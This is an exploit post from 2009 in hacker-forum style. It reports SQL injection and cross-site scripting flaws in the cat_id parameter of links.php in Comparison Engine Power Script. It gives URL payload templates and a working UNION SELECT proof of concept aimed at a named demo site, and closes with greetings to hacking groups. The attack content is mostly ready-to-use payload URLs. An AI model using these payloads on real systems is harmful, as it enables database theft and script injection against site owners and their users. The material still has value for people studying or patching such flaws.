[+]=================================================================[+] [x]Title : Comparison Engine Power Script sql & xss Injection Vulnerability [x]Software : Comparison Engine Power Script [x]Vendor : http://www.cmsnx.com [x]Download : http://www.cmsnx.com/product.download.php?id=14 [x]Date : 26 April 2009 ( Indonesia ) [x]Author : OoN_Boy [x]Contact : oon.boy9@gmail.com [x]Blog : http://oonboy.blogspot.com [+]=================================================================[+] [x] Exploit http://[site]/[path]/links.php?cat_id=[xss] http://[site]/[path]/links.php?cat_id=[sql] [+]=================================================================[x] [x]Poc http://www.kalptarudemos.com/demo/comparisonengine/links.php?cat_id="" http://www.kalptarudemos.com/demo/comparisonengine/links.php?cat_id=-2%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18-- [+]=================================================================[+] [x] Special Greetz www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot, zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny Dan buat semuanya yg ga bisa di sebut satu² [+]=================================================================[+]